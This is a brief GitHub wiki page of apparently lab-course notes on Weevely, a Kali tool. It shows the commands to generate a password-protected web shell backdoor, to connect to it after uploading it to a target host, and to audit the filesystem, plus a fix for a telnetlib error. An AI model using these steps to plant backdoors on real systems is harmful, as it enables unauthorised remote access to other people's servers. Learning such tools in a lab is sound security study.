Weevely - tmansfield42/Tech-Journal GitHub Wiki

Weevely is a tool on kali linux to generate files that can be used to create reverse shells.

Usage:

Create a backdoor

weevely generate PASSWORD /home/champuser/mybackdoor

generates a file called mybackdoor with the password "PASSWORD"

Use the backdoor

weevely http://10.0.5.25/upload/mybackdoor PASSWORD

creates a reverse shell session, make sure you upload the file to the attack target using ftp

Use weevely

:audit filesystem

allows you to audit the filesystem, if commands like id, whoami, etc. arent working, typing this fixed that issue

Problems

recieving no module named 'telnetlib' when trying to access the backdoor via http request

(https://github.com/threat9/routersploit/issues/860)

Do the following:

  • sudo pip install telnetlib3 --break-system-packages

  • telnetlib is deprecated in newer versions of python, this tool still uses the old telnetlib

  • sudo nano /usr/share/weevely/modules/backdoor/tcp.py and in line 6 change telnetlib to telnetlib3

  • create a new backdoor, you can use the same password